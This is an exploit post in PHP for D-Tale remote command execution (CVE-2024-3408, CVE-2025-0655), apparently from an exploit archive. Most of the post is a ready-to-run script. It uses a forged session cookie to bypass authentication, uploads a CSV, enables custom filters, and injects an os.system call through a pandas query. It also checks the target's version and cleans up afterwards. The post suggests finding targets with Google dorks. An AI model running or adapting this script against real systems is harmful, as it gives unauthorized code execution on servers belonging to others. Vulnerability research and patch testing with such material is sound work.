=============================================================================================================================================
| # Title     : D Tale v3.10.0 PHP code execution vulnerability                                                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://pypi.org/project/dtale/                                                                                             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Exploiting D-Tale Remote Command Execution Vulnerability Using PHP

   (Related : https://packetstorm.news/files/id/189509/ Linked CVE numbers:	CVE-2024-3408, CVE-2025-0655  ) .
	
[+] save code as poc.php.

[+] Set Target = line 102

[+] Usage = php poc.php

[+] PayLoad :

<?php
class D_Tale_RCE_Exploit {

    private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
    private $target_url;
    private $data_id;
    private $payload;

    public function __construct($target_url, $payload) {
        $this->target_url = $target_url;
        $this->payload = $payload;
    }

    // Function to send GET requests
    private function send_get_request($uri, $headers = []) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    // Function to send POST requests
    private function send_post_request($uri, $data, $headers = []) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    // Check for vulnerable version
    public function check_vulnerability() {
        $headers = ['Cookie: session=' . $this->session];
        $response = $this->send_get_request('/dtale/popup/upload', $headers);
        
        if (strpos($response, 'version') !== false) {
            preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
            if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
                return true;
            }
        }
        return false;
    }

    // Exploit the vulnerability
    public function exploit() {
        // Step 1: Upload a CSV file to trigger the exploit
        $mime_boundary = "---------------------------" . rand();
        $data = "--$mime_boundary\r\n";
        $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
        $data .= "Content-Type: text/csv\r\n\r\n";
        $data .= "payload_data\r\n";
        $data .= "--$mime_boundary--\r\n";

        $headers = [
            'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
            'Cookie: session=' . $this->session
        ];

        $response = $this->send_post_request('/dtale/upload', $data, $headers);
        
        preg_match('/"data_id":"(.*?)"/', $response, $matches);
        if (isset($matches[1])) {
            $this->data_id = $matches[1];
            echo "Data ID: " . $this->data_id . "\n";
        } else {
            echo "Failed to get data ID.\n";
            return;
        }

        // Step 2: Enable custom filters
        $settings = json_encode(['enable_custom_filters' => true]);
        $this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);
        
        // Step 3: Execute the payload via custom filter
        $query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
        $this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);

        echo "Payload executed successfully.\n";
    }

    // Cleanup after exploit
    public function cleanup() {
        if ($this->data_id) {
            $headers = ['Cookie: session=' . $this->session];
            $this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
            echo "Cleaned up the dataset.\n";
        }
    }
}

// Usage
$target_url = 'http://target.site.com';
$payload = 'id'; // Example payload

$exploit = new D_Tale_RCE_Exploit($target_url, $payload);

if ($exploit->check_vulnerability()) {
    echo "Vulnerable version detected. Exploiting...\n";
    $exploit->exploit();
    $exploit->cleanup();
} else {
    echo "Target is not vulnerable.\n";
}
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================